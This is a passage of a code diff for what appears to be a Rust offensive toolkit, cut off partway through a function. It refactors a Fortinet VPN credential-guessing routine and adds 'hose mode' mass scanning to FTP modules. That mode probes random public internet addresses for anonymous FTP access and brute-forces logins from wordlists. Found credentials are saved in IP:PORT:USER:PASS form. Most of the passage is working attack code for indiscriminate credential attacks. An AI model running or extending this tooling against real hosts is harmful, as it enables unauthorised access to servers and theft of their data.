@@ -421,11 +296,19 @@ async fn try_fortinet_login(
// Send login request
let login_url = format!("{}/remote/logincheck", base_url);
// Build form body
let mut form_pairs: Vec<String> = Vec::new();
for (key, val) in &form_data {
form_pairs.push(format!("{}={}", key, urlencoding::encode(val)));
}
let body = form_pairs.join("&");
let login_response = match timeout(
timeout_duration,
client
.post(&login_url)
.form(&form_data)
.header("Content-Type", "application/x-www-form-urlencoded")
.body(body)
.header("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36")
.header("Referer", &login_page_url)
.send()
@@ -456,38 +339,28 @@ async fn try_fortinet_login(
Err(_) => return Err(anyhow!("Timeout reading login response")),
};
// Check for success indicators
if response_body.contains("redir")
|| response_body.contains("\"1\"")
|| response_body.contains("success")
|| response_body.contains("/remote/index")
|| response_body.contains("portal")
{
// Check for explicit success indicators
let success_indicators = ["redir", "\"1\"", "success", "/remote/index", "portal"];
if success_indicators.iter().any(|&indicator| response_body.contains(indicator)) {
return Ok(true);
}
// Check for failure indicators
if response_body.contains("error")
|| response_body.contains("invalid")
|| response_body.contains("failed")
|| response_body.contains("incorrect")
|| response_body.contains("\"0\"")
{
// Check for explicit failure indicators
let failure_indicators = ["error", "invalid", "failed", "incorrect", "\"0\""];
if failure_indicators.iter().any(|&indicator| response_body.contains(indicator)) {
return Ok(false);
}
// Check status and cookies
// Check status code and authentication cookies
if status.is_success() && has_auth_cookie {
return Ok(true);
}
// Check redirect location
// Check redirect location for success
if status.as_u16() == 302 {
if let Some(loc_str) = location_header {
if loc_str.contains("/remote/index")
|| loc_str.contains("portal")
|| loc_str.contains("index")
{
let success_redirects = ["/remote/index", "portal", "index"];
if success_redirects.iter().any(|&path| loc_str.contains(path)) {
return Ok(true);
}
}
@@ -496,21 +369,21 @@ async fn try_fortinet_login(
Ok(false)
}
/// Extracts CSRF token from HTML response
/// Extracts CSRF token from HTML response using pre-compiled regex patterns
fn extract_csrf_token(html: &str) -> Option<String> {
let patterns = vec![
r#"name="magic"\s+value="([^"]+)""#,
r#"name="csrf_token"\s+value="([^"]+)""#,
r#""magic"\s*:\s*"([^"]+)""#,
r#"magic=([^&\s"]+)"#,
];
static CSRF_PATTERNS: Lazy<Vec<Regex>> = Lazy::new(|| {
vec![
Regex::new(r#"name="magic"\s+value="([^"]+)""#).expect("Invalid regex pattern"),
Regex::new(r#"name="csrf_token"\s+value="([^"]+)""#).expect("Invalid regex pattern"),
Regex::new(r#""magic"\s*:\s*"([^"]+)""#).expect("Invalid regex pattern"),
Regex::new(r#"magic=([^&\s"]+)"#).expect("Invalid regex pattern"),
]
});
for pattern in patterns {
if let Ok(re) = Regex::new(pattern) {
if let Some(captures) = re.captures(html) {
if let Some(token) = captures.get(1) {
return Some(token.as_str().to_string());
}
for pattern in CSRF_PATTERNS.iter() {
if let Some(captures) = pattern.captures(html) {
if let Some(token) = captures.get(1) {
return Some(token.as_str().to_string());
}
}
}
@@ -518,134 +391,27 @@ fn extract_csrf_token(html: &str) -> Option<String> {
None
}
async fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
} else {
println!("{}", "This field is required. Please provide a value.".yellow());
}
}
}
async fn prompt_default(msg: &str, default_val: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default_val).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
Ok(if trimmed.is_empty() {
default_val.to_string()
} else {
trimmed.to_string()
})
}
async fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default_char).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let input = s.trim().to_lowercase();
if input.is_empty() {
return Ok(default_yes);
} else if input == "y" || input == "yes" {
return Ok(true);
} else if input == "n" || input == "no" {
return Ok(false);
} else {
println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow());
}
}
}
async fn prompt_optional(msg: &str) -> Result<Option<String>> {
print!("{}", format!("{} (optional, press Enter to skip): ", msg).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
Ok(if trimmed.is_empty() {
None
} else {
Some(trimmed.to_string())
})
}
/// Builds Fortinet VPN URL with proper IPv6 handling
fn build_fortinet_url(target: &str, port: u16) -> Result<String> {
let clean_target = target.trim_matches(|c| c == '[' || c == ']');
let is_ipv6 = clean_target.contains(':') && !clean_target.contains('.');
let normalized_host = normalize_target(target)?;
let url = if is_ipv6 {
format!("https://[{}]:{}", clean_target, port)
// Check if port is already present
let has_port = if normalized_host.starts_with('[') {
// IPv6 case: check if there's a colon after the closing bracket
if let Some(bracket_pos) = normalized_host.rfind(']') {
normalized_host[bracket_pos..].contains(':')
} else {
false
}
} else {
format!("https://{}:{}", clean_target, port)
normalized_host.contains(':')
};
let url = if has_port {
format!("https://{}", normalized_host)
} else {
format!("https://{}:{}", normalized_host, port)
};
Ok(url)
}
fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
let file = File::open(path.as_ref())
.map_err(|e| anyhow!("Failed to open file '{}': {}", path.as_ref().display(), e))?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(Result::ok)
.map(|line| line.trim().to_string())
.filter(|line| !line.is_empty())
.collect())
}
fn get_filename_in_current_dir(input_path_str: &str) -> PathBuf {
let path = Path::new(input_path_str);
let filename_component = path
.file_name()
.map(|os_str| os_str.to_string_lossy())
.unwrap_or_else(|| std::borrow::Cow::Borrowed(input_path_str));
let final_name = if filename_component.is_empty()
|| filename_component == "."
|| filename_component == ".."
|| filename_component.contains('/')
|| filename_component.contains('\\')
{
"fortinet_results.txt"
} else {
filename_component.as_ref()
};
PathBuf::from(format!("./{}", final_name))
}
+241 -4
View File
@@ -1,15 +1,41 @@
use anyhow::{anyhow, Result};
use anyhow::{anyhow, Result, Context};
use colored::*;
use suppaftp::{AsyncFtpStream, AsyncNativeTlsFtpStream, AsyncNativeTlsConnector};
use suppaftp::tokio::{AsyncFtpStream, AsyncNativeTlsFtpStream, AsyncNativeTlsConnector};
use suppaftp::async_native_tls::TlsConnector;
use tokio::time::{timeout, Duration};
use std::sync::Arc;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio::sync::Semaphore;
use tokio::process::Command;
use tokio::fs::OpenOptions;
use tokio::io::AsyncWriteExt;
use std::net::{IpAddr, Ipv4Addr, SocketAddr};
use rand::Rng;
use tokio::net::TcpStream; // For fast connect check
use crate::utils::{prompt_default, prompt_int_range, prompt_yes_no};
const DEFAULT_TIMEOUT_SECS: u64 = 5;
const CONNECT_TIMEOUT_MS: u64 = 3000;
const STATE_FILE: &str = "ftp_hose_state.log";
// Hardcoded exclusions
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32",
"8.8.8.8/32", "8.8.4.4/32"
];
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ FTP Anonymous Login Checker ║".cyan());
println!("{}", "║ Supports FTP and FTPS (TLS) with IPv4/IPv6 ".cyan());
println!("{}", "║ Supports IPv4/IPv6 & Mass Scanning (Hose Mode)".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!();
}
@@ -37,7 +63,17 @@ fn format_addr(target: &str, port: u16) -> String {
/// Anonymous FTP/FTPS login test with IPv6 support
pub async fn run(target: &str) -> Result<()> {
display_banner();
// Check for Mass Scan Mode conditions
let is_mass_scan = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0" || std::path::Path::new(target).is_file();
if is_mass_scan {
println!("{}", format!("[*] Target: {}", target).cyan());
println!("{}", "[*] Mode: Mass Scan / Hose".yellow());
return run_mass_scan(target).await;
}
// --- Standard Single Target Logic ---
let addr = format_addr(target, 21);
let domain = target
.trim_start_matches('[')
@@ -55,6 +91,13 @@ pub async fn run(target: &str) -> Result<()> {
let result = ftp.login("anonymous", "anonymous").await;
if result.is_ok() {
println!("{}", "[+] Anonymous login successful (FTP)".green().bold());
// Optional: Check if we can run command?
// For single target, we usually just report login success in legacy mode.
// But let's be consistent and try listing.
match ftp.list(None).await {
Ok(_) => println!("{}", "[+] LIST command successful - Read Access Confirmed".green()),
Err(e) => println!("{}", format!("[-] Login worked but LIST failed: {}", e).yellow()),
}
let _ = ftp.quit().await;
return Ok(());
} else if let Err(e) = result {
@@ -93,6 +136,10 @@ pub async fn run(target: &str) -> Result<()> {
match ftps.login("anonymous", "anonymous").await {
Ok(_) => {
println!("{}", "[+] Anonymous login successful (FTPS)".green().bold());
match ftps.list(None).await {
Ok(_) => println!("{}", "[+] LIST command successful - Read Access Confirmed".green()),
Err(e) => println!("{}", format!("[-] Login worked but LIST failed: {}", e).yellow()),
}
let _ = ftps.quit().await;
}
Err(e) if e.to_string().contains("530") => {
@@ -103,3 +150,193 @@ pub async fn run(target: &str) -> Result<()> {
Ok(())
}
async fn run_mass_scan(target: &str) -> Result<()> {
// Prep
let concurrency = prompt_int_range("Max concurrent hosts to scan", 500, 1, 10000)? as usize;
let _verbose = prompt_yes_no("Verbose mode?", false)?;
let output_file = prompt_default("Output result file", "ftp_mass_results.txt")?;
// Parse exclusions
let mut exclusion_subnets = Vec::new();
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusion_subnets.push(net);
}
}
let exclusions = Arc::new(exclusion_subnets);
let semaphore = Arc::new(Semaphore::new(concurrency));
let stats_checked = Arc::new(AtomicUsize::new(0));
let stats_found = Arc::new(AtomicUsize::new(0));
// Stats
let s_checked = stats_checked.clone();
let s_found = stats_found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(5)).await;
println!(
"[*] Status: {} IPs scanned, {} open anonymous FTP found",
s_checked.load(Ordering::Relaxed),
s_found.load(Ordering::Relaxed).to_string().green().bold()
);
}
});
let run_random = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0";
if run_random {
println!("{}", "[*] Starting Random Internet Scan...".green());
loop {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let exc = exclusions.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
mass_scan_host(ip, sf, of).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
} else {
// File Mode
let content = tokio::fs::read_to_string(target).await.unwrap_or_default();
let lines: Vec<String> = content.lines().map(|s| s.trim().to_string()).filter(|s| !s.is_empty()).collect();
println!("{}", format!("[*] Loaded {} targets from file.", lines.len()).blue());
for ip_str in lines {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
// Simple IP parse
if let Ok(ip) = ip_str.parse::<IpAddr>() {
tokio::spawn(async move {
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
mass_scan_host(ip, sf, of).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
} else {
drop(permit);
}
}
for _ in 0..concurrency {
let _ = semaphore.acquire().await.context("Semaphore acquisition failed")?;
}
}
Ok(())
}
async fn mass_scan_host(
ip: IpAddr,
stats_found: Arc<AtomicUsize>,
output_file: String,
) {
let sa = SocketAddr::new(ip, 21);
// 1. Connection Check
if timeout(Duration::from_millis(CONNECT_TIMEOUT_MS), TcpStream::connect(&sa)).await.is_err() {
return;
}
// 2. FTP Login (Plain only for speed/mass scan)
let addr_str = format!("{}:21", ip);
match timeout(Duration::from_millis(5000), AsyncFtpStream::connect(&addr_str)).await {
Ok(Ok(mut ftp)) => {
let result = ftp.login("anonymous", "anonymous").await;
if result.is_ok() {
// LOGIN OK - Now VERIFY command capability
// We use LIST (None implies current directory)
// We set a short timeout for list because sometimes passive mode hangs on bad NATs
match timeout(Duration::from_secs(5), ftp.list(None)).await {
Ok(Ok(_)) => {
// Success: Login + List
// Format: IP:PORT:USER:PASS
let msg = format!("{}:21:anonymous:anonymous", ip);
println!("\r{}", format!("[+] FOUND: {}", msg).green().bold());
if let Ok(mut file) = OpenOptions::new().create(true).append(true).open(&output_file).await {
let _ = file.write_all(format!("{}\n", msg).as_bytes()).await;
}
stats_found.fetch_add(1, Ordering::Relaxed);
}
Ok(Err(_)) => {
// Login ok, List failed (550 or similar)
}
Err(_) => {
// List timed out (PASV issue?)
}
}
let _ = ftp.quit().await;
}
}
_ => {}
}
}
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
let mut excluded = false;
for net in exclusions {
if net.contains(ip_addr) {
excluded = true;
break;
}
}
if !excluded {
return ip_addr;
}
}
}
async fn is_ip_checked(ip: &impl ToString) -> bool {
if !std::path::Path::new(STATE_FILE).exists() {
return false;
}
let ip_s = ip.to_string();
let status = Command::new("grep")
.arg("-F")
.arg("-q")
.arg(format!("checked: {}", ip_s))
.arg(STATE_FILE)
.stderr(std::process::Stdio::null()) // Suppress stderr just in case
.status()
.await;
match status {
Ok(s) => s.success(),
Err(_) => false,
}
}
async fn mark_ip_checked(ip: &impl ToString) {
let data = format!("checked: {}\n", ip.to_string());
if let Ok(mut file) = OpenOptions::new()
.create(true)
.append(true)
.open(STATE_FILE)
.await
{
let _ = file.write_all(data.as_bytes()).await;
}
}
+352 -297
View File
@@ -1,106 +1,109 @@
use anyhow::{anyhow, Context, Result};
use anyhow::{anyhow, Result, Context};
use colored::*;
use suppaftp::{AsyncFtpStream, AsyncNativeTlsConnector, AsyncNativeTlsFtpStream};
use suppaftp::tokio::{AsyncFtpStream, AsyncNativeTlsConnector, AsyncNativeTlsFtpStream};
use suppaftp::async_native_tls::TlsConnector;
use std::{
fs::File,
io::{BufRead, BufReader, Write},
path::PathBuf,
io::Write,
sync::Arc,
time::Instant,
time::Duration,
net::{IpAddr, Ipv4Addr, SocketAddr},
};
use std::path::Path;
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use std::sync::atomic::{AtomicBool, AtomicUsize, Ordering};
use tokio::{
io::{AsyncBufReadExt, AsyncWriteExt},
sync::{Mutex, Semaphore},
time::{sleep, Duration},
time::{sleep, timeout},
process::Command,
fs::OpenOptions,
io::AsyncWriteExt,
net::TcpStream,
};
use futures::stream::{FuturesUnordered, StreamExt};
use rand::Rng;
use crate::utils::{
prompt_required, prompt_default, prompt_yes_no,
prompt_int_range, prompt_wordlist,
load_lines, get_filename_in_current_dir
};
use crate::modules::creds::utils::BruteforceStats;
const PROGRESS_INTERVAL_SECS: u64 = 2;
const DEFAULT_TIMEOUT_SECS: u64 = 10;
const MASS_SCAN_CONNECT_TIMEOUT_MS: u64 = 3000;
const STATE_FILE: &str = "ftp_brute_hose_state.log";
// Statistics tracking for progress reporting
struct Statistics {
total_attempts: AtomicU64,
successful_attempts: AtomicU64,
failed_attempts: AtomicU64,
error_attempts: AtomicU64,
start_time: Instant,
// Hardcoded exclusions
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32",
"8.8.8.8/32", "8.8.4.4/32"
];
/// FTP error classification for better handling
#[derive(Debug, Clone, Copy)]
enum FtpErrorType {
AuthenticationFailed,
TlsRequired,
ConnectionLimitExceeded,
ConnectionFailed,
Unknown,
}
impl Statistics {
fn new() -> Self {
Self {
total_attempts: AtomicU64::new(0),
successful_attempts: AtomicU64::new(0),
failed_attempts: AtomicU64::new(0),
error_attempts: AtomicU64::new(0),
start_time: Instant::now(),
impl FtpErrorType {
/// Classify FTP error based on response message
fn classify_error(msg: &str) -> Self {
let msg_lower = msg.to_lowercase();
// Authentication failed
if msg.contains("530") || msg_lower.contains("login incorrect") ||
msg_lower.contains("user") && msg_lower.contains("cannot") ||
msg_lower.contains("password") && msg_lower.contains("incorrect") {
return Self::AuthenticationFailed;
}
}
fn record_attempt(&self, success: bool, error: bool) {
self.total_attempts.fetch_add(1, Ordering::Relaxed);
if error {
self.error_attempts.fetch_add(1, Ordering::Relaxed);
} else if success {
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
} else {
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
// TLS required
if msg.contains("550 SSL") || msg_lower.contains("tls required") ||
msg_lower.contains("ssl connection required") ||
msg.contains("220 TLS go first") ||
msg_lower.contains("must use tls") {
return Self::TlsRequired;
}
}
fn print_progress(&self) {
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
print!(
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
"[Progress]".cyan(),
total.to_string().bold(),
success.to_string().green(),
failed,
errors.to_string().red(),
rate
);
let _ = std::io::Write::flush(&mut std::io::stdout());
}
fn print_final(&self) {
println!();
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
println!("{}", "=== Statistics ===".bold());
println!(" Total attempts: {}", total);
println!(" Successful: {}", success.to_string().green().bold());
println!(" Failed: {}", failed);
println!(" Errors: {}", errors.to_string().red());
println!(" Elapsed time: {:.2}s", elapsed);
if elapsed > 0.0 {
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
// Connection limit exceeded
if msg.contains("421") || msg_lower.contains("too many") ||
msg_lower.contains("connection limit") {
return Self::ConnectionLimitExceeded;
}
// Connection failed
if msg_lower.contains("connection refused") ||
msg_lower.contains("no route to host") ||
msg_lower.contains("network unreachable") ||
msg_lower.contains("connection reset") {
return Self::ConnectionFailed;
}
Self::Unknown
}
}
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ FTP Brute Force Module ║".cyan());
println!("{}", "║ Supports FTP and FTPS (TLS) with IPv4/IPv6 ".cyan());
println!("{}", "║ Supports IPv4/IPv6 & Mass Scanning (Hose Mode)".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!();
}
/// Format IPv4 or IPv6 addresses with port
fn format_addr(target: &str, port: u16) -> String {
/// Format IPv4 or IPv6 addresses with port for display
fn format_addr_for_display(target: &str, port: u16) -> String {
if target.starts_with('[') && target.contains("]:") {
target.to_string()
} else if target.matches(':').count() == 1 && !target.contains('[') {
@@ -119,19 +122,32 @@ fn format_addr(target: &str, port: u16) -> String {
}
}
pub async fn run(target: &str) -> Result<()> {
display_banner();
// Check for Mass Scan Mode
let is_mass_scan = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0" || std::path::Path::new(target).is_file();
if is_mass_scan {
println!("{}", format!("[*] Target: {}", target).cyan());
println!("{}", "[*] Mode: Mass Scan / Hose".yellow());
return run_mass_scan(target).await;
}
println!("{}", format!("[*] Target: {}", target).cyan());
// --- Standard Single Target Logic ---
let port: u16 = loop {
let input = prompt_default("FTP Port", "21").await?;
let input = prompt_default("FTP Port", "21")?;
if let Ok(p) = input.parse() { break p }
println!("Invalid port. Try again.");
};
let usernames_file = prompt_required("Username wordlist").await?;
let passwords_file = prompt_required("Password wordlist").await?;
let usernames_file = prompt_required("Username wordlist")?;
let passwords_file = prompt_required("Password wordlist")?;
let concurrency: usize = loop {
let input = prompt_default("Max concurrent tasks", "500").await?;
let input = prompt_default("Max concurrent tasks", "500")?;
if let Ok(n) = input.parse::<usize>() {
if n > 0 { break n }
}
@@ -141,23 +157,25 @@ pub async fn run(target: &str) -> Result<()> {
// Create a semaphore to limit concurrent network operations
let semaphore = Arc::new(Semaphore::new(concurrency));
let stop_on_success = prompt_yes_no("Stop on first success?", true).await?;
let save_results = prompt_yes_no("Save results to file?", true).await?;
let stop_on_success = prompt_yes_no("Stop on first success?", true)?;
let save_results = prompt_yes_no("Save results to file?", true)?;
let save_path = if save_results {
Some(prompt_default("Output file", "ftp_results.txt").await?)
Some(prompt_default("Output file", "ftp_results.txt")?)
} else {
None
};
let verbose = prompt_yes_no("Verbose mode?", false).await?;
let combo_mode = prompt_yes_no("Combination mode (user × pass)?", false).await?;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let combo_mode = prompt_yes_no("Combination mode (user × pass)?", false)?;
let display_addr = format_addr_for_display(target, port);
let connect_addr = format_addr_for_display(target, port);
let addr = format_addr(target, port);
let found = Arc::new(Mutex::new(Vec::new()));
let unknown = Arc::new(Mutex::new(Vec::<(String, String, String, String)>::new()));
let stop = Arc::new(AtomicBool::new(false));
let stats = Arc::new(Statistics::new());
let stats = Arc::new(BruteforceStats::new());
println!("\n[*] Starting brute-force on {}", addr);
println!("\n[*] Starting brute-force on {}", display_addr);
let users = load_lines(&usernames_file)?;
if users.is_empty() {
@@ -198,7 +216,9 @@ pub async fn run(target: &str) -> Result<()> {
for pass in &passes {
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
let addr_clone = addr.clone();
let addr_clone = connect_addr.clone();
let target_clone = target.to_string();
let display_addr_clone = display_addr.clone();
let user_clone = user.clone();
let pass_clone = pass.clone();
let found_clone = Arc::clone(&found);
@@ -220,10 +240,10 @@ pub async fn run(target: &str) -> Result<()> {
if stop_on_success_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
match try_ftp_login(&addr_clone, &user_clone, &pass_clone, verbose_flag).await {
match try_ftp_login(&addr_clone, &target_clone, &user_clone, &pass_clone, verbose_flag).await {
Ok(true) => {
println!("\r{}", format!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone).green().bold());
found_clone.lock().await.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone()));
println!("\r{}", format!("[+] {} -> {}:{}", display_addr_clone, user_clone, pass_clone).green().bold());
found_clone.lock().await.push((display_addr_clone.clone(), user_clone.clone(), pass_clone.clone()));
stats_clone.record_attempt(true, false);
if stop_on_success_flag {
stop_clone.store(true, Ordering::Relaxed);
@@ -232,30 +252,23 @@ pub async fn run(target: &str) -> Result<()> {
Ok(false) => {
stats_clone.record_attempt(false, false);
if verbose_flag {
println!("\r{}", format!("[-] {} -> {}:{}", addr_clone, user_clone, pass_clone).dimmed());
println!("\r{}", format!("[-] {} -> {}:{}", display_addr_clone, user_clone, pass_clone).dimmed());
}
}
Err(e) => {
stats_clone.record_attempt(false, true);
let msg = e.to_string();
{
let mut unk = unknown_clone.lock().await;
unk.push((
addr_clone.clone(),
let mut _unknown_clone = unknown_clone.lock().await;
_unknown_clone.push((
display_addr_clone.clone(),
user_clone.clone(),
pass_clone.clone(),
msg.clone(),
));
}
if verbose_flag {
println!(
"\r{}",
format!(
"[?] {} -> {}:{} error/unknown: {}",
addr_clone, user_clone, pass_clone, msg
)
.yellow()
);
println!("\r{}", format!("[?] {} -> {}:{} error/unknown: {}", display_addr_clone, user_clone, pass_clone, msg).yellow());
}
}
}
@@ -269,7 +282,9 @@ pub async fn run(target: &str) -> Result<()> {
if stop_on_success && stop.load(Ordering::Relaxed) { break; }
let user = users.get(i % users.len()).expect("User list modulus logic error").clone();
let addr_clone = addr.clone();
let addr_clone = connect_addr.clone();
let target_clone = target.to_string();
let display_addr_clone = display_addr.clone();
let pass_clone = pass.clone();
let found_clone = Arc::clone(&found);
let unknown_clone = Arc::clone(&unknown);
@@ -290,10 +305,10 @@ pub async fn run(target: &str) -> Result<()> {
if stop_on_success_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
match try_ftp_login(&addr_clone, &user, &pass_clone, verbose_flag).await {
match try_ftp_login(&addr_clone, &target_clone, &user, &pass_clone, verbose_flag).await {
Ok(true) => {
println!("\r{}", format!("[+] {} -> {}:{}", addr_clone, user, pass_clone).green().bold());
found_clone.lock().await.push((addr_clone.clone(), user.clone(), pass_clone.clone()));
println!("\r{}", format!("[+] {} -> {}:{}", display_addr_clone, user, pass_clone).green().bold());
found_clone.lock().await.push((display_addr_clone.clone(), user.clone(), pass_clone.clone()));
stats_clone.record_attempt(true, false);
if stop_on_success_flag {
stop_clone.store(true, Ordering::Relaxed);
@@ -302,7 +317,7 @@ pub async fn run(target: &str) -> Result<()> {
Ok(false) => {
stats_clone.record_attempt(false, false);
if verbose_flag {
println!("\r{}", format!("[-] {} -> {}:{}", addr_clone, user, pass_clone).dimmed());
println!("\r{}", format!("[-] {} -> {}:{}", display_addr_clone, user, pass_clone).dimmed());
}
}
Err(e) => {
@@ -311,21 +326,14 @@ pub async fn run(target: &str) -> Result<()> {
{
let mut unk = unknown_clone.lock().await;
unk.push((
addr_clone.clone(),
display_addr_clone.clone(),
user.clone(),
pass_clone.clone(),
msg.clone(),
));
}
if verbose_flag {
println!(
"\r{}",
format!(
"[?] {} -> {}:{} error/unknown: {}",
addr_clone, user, pass_clone, msg
)
.yellow()
);
println!("\r{}", format!("[!] Error: {}", e).yellow());
}
}
}
@@ -348,7 +356,7 @@ pub async fn run(target: &str) -> Result<()> {
let _ = progress_handle.await;
// Print final statistics
stats.print_final();
stats.print_final().await;
let creds = found.lock().await;
if creds.is_empty() {
@@ -356,15 +364,18 @@ pub async fn run(target: &str) -> Result<()> {
} else {
println!("{}", format!("[+] Found {} valid credential(s):", creds.len()).green().bold());
for (host, user, pass) in creds.iter() {
println!(" {} {} -> {}:{}", "".green(), host, user, pass);
println!(" {} {}:{}:{}", "".green(), host, user, pass);
}
if let Some(path) = save_path {
let file_path = get_filename_in_current_dir(&path);
match File::create(&file_path) {
Ok(mut file) => {
for (host, user, pass) in creds.iter() {
if writeln!(file, "{} -> {}:{}", host, user, pass).is_err() {
eprintln!("[!] Error writing to result file '{}'", file_path.display());
// Standardized format: IP:PORT:USER:PASS
// host should already include IP:PORT based on `display_addr` formatting earlier
// But wait, `display_addr` is `[IP]:Port` or `IP:Port`
// We want strictly `IP:PORT:USER:PASS`
if writeln!(file, "{}:{}:{}", host, user, pass).is_err() {
break;
}
}
@@ -377,57 +388,168 @@ pub async fn run(target: &str) -> Result<()> {
}
}
drop(creds);
Ok(())
}
// Unknown / errored attempts
let unknown_guard = unknown.lock().await;
if !unknown_guard.is_empty() {
println!(
"{}",
format!(
"[?] Collected {} unknown/errored FTP responses.",
unknown_guard.len()
)
.yellow()
.bold()
);
if prompt_yes_no("Save unknown responses to file?", true).await? {
let default_name = "ftp_unknown_responses.txt";
let prompt_msg = format!(
"What should the unknown results be saved as? (default: {})",
default_name
async fn run_mass_scan(target: &str) -> Result<()> {
// Prep
let port: u16 = prompt_default("FTP Port", "21")?.parse().unwrap_or(21);
let usernames_file = prompt_wordlist("Username wordlist")?;
let passwords_file = prompt_wordlist("Password wordlist")?;
let users = load_lines(&usernames_file)?;
let pass_lines = load_lines(&passwords_file)?;
if users.is_empty() { return Err(anyhow!("User list empty")); }
if pass_lines.is_empty() { return Err(anyhow!("Pass list empty")); }
let concurrency = prompt_int_range("Max concurrent hosts to scan", 500, 1, 10000)? as usize;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let output_file = prompt_default("Output result file", "ftp_brute_mass_results.txt")?;
// Parse exclusions
let mut exclusion_subnets = Vec::new();
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusion_subnets.push(net);
}
}
let exclusions = Arc::new(exclusion_subnets);
let semaphore = Arc::new(Semaphore::new(concurrency));
let stats_checked = Arc::new(AtomicUsize::new(0));
let stats_found = Arc::new(AtomicUsize::new(0));
let creds_pkg = Arc::new((users, pass_lines));
// Stats
let s_checked = stats_checked.clone();
